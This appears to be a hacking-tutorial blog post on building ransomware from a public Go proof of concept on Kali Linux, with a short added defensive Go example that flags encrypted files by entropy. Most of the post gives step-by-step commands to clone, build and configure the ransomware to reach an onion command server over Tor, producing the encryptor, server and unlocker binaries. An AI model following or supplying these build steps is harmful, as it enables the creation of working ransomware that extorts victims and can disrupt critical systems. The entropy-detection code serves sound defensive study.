Ransomware is fast becoming the most important form of malware affecting our digital systems. Companies around the world are being hit by various forms of malware, including a new variant, Snake, designed specifically for SCADA/ICS systems.
Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the risk this ransomware poses to a nation's industrial systems and infrastructure. Recently, the major American insurance company CNA admitted to paying a ransom of 40 million dollars! No wonder ransomware developers are getting more creative and more malicious: ransomware pays!
To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposes, but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, the malware is written in Golang.
The malware encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.
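As an added example (not part of the PoC or this article), the defender-side consequence of that design: AES-CTR output is indistinguishable from random bytes, so a byte-entropy check over file contents is one of the cheapest ways to spot files that have already been rewritten by ransomware. The key, IV and sample document are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
	"math"
)

// shannonEntropy returns bits of entropy per byte (0 to 8); ciphertext sits near 8.
func shannonEntropy(data []byte) float64 {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	n, h := float64(len(data)), 0.0
	for _, c := range counts {
		if c > 0 {
			p := float64(c) / n
			h -= p * math.Log2(p)
		}
	}
	return h
}
// looksEncrypted is the detection rule: 7.5 bits/byte is a sane cut-off for files over a few KB.
func looksEncrypted(data []byte, threshold float64) bool {
	return shannonEntropy(data) >= threshold
}

// aesCTR builds the "after encryption" sample with AES-256-CTR, the mode the PoC uses.
func aesCTR(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(out, plaintext)
	return out, nil
}
func main() {
	doc := bytes.Repeat([]byte("Quarterly report: revenue up 4%, costs flat.\n"), 100) // constructed sample
	key := bytes.Repeat([]byte{0x42}, 32) // fixed demo key; 32 bytes selects AES-256
	enc, _ := aesCTR(key, make([]byte, aes.BlockSize), doc)
	fmt.Printf("document  %.2f bits/byte flagged=%v\n", shannonEntropy(doc), looksEncrypted(doc, 7.5))
	fmt.Printf("encrypted %.2f bits/byte flagged=%v\n", shannonEntropy(enc), looksEncrypted(enc, 7.5))
}
```

A real monitor would sample only the first few KB of each file and pair the entropy score with a known-compressed-format allowlist (zip, jpeg, pdf streams), since those are legitimately high-entropy.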
Step #1: Download and install the binaries
The first step is to run Kali and make sure golang is installed. If not, download it from the Kali repositories by entering,
kali > sudo apt install golang
Then you will need to login as root user.
kali > sudo su -
Now create a directory for the binaries. In this case, I simply named it “git”.
kali > mkdir git
Then change directory (cd) to that directory.
kali > cd git
Then download the binaries from github.com.
kali > git clone https://github.com/mauri870/ransomware
Step #2: Export GO variables
Next, we need to set and export the Go environment variables so that Go and the build find the binaries and source in the appropriate directories.
Step #3: Build the source code dependencies
Now, with the variables set and exported, we need to fetch the dependencies. Navigate to the new directory, ransomware, and type make deps.
kali > cd ransomware
kali > make deps
Step #4: Build the source code with options
Now that make deps has completed, we can build the source code. In our case, we will use a few options.
First, we want to route our communications with the server over the Tor network.
USE_TOR=true
Second, we want to use our server at hackersarisegtdj.onion (you can use any domain or localhost).
SERVER_HOST=hackersarisegtdj.onion
Third, we want to use the port 80 (you can use any port).
SERVER_PORT=80
Finally, we want to set the target operating system for the build, in this case Linux.
GOOS=linux
Our command should look something like this,
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Now press ENTER to build your ransomware.
Step #5: Check the directory for ransomware.exe
Once the build finishes, list the contents of the ransomware directory.
kali > ls -l
Now, navigate to the bin directory.
kali > cd bin
Here, you will see ransomware.exe, server and unlocker.exe.
Step #6: Consider the types of files to encrypt
If you want to see what types of files this ransomware will encrypt, go to the cmd directory and open common.go.
kali > cd cmd
kali > more common.go
Here, you can see the list of file extensions this ransomware targets for encryption when executed.
Summary
Ransomware is perhaps the biggest threat to our digital systems right now. As the Colonial Pipeline attack clearly demonstrated, almost everyone is vulnerable, and if SCADA/ICS systems are compromised there can be significant financial and infrastructure impacts!
This ransomware POC will help you better understand ransomware as a threat and check whether your systems are vulnerable to such an attack.
In the second part of this series, we will test the ransomware on a Windows VM.
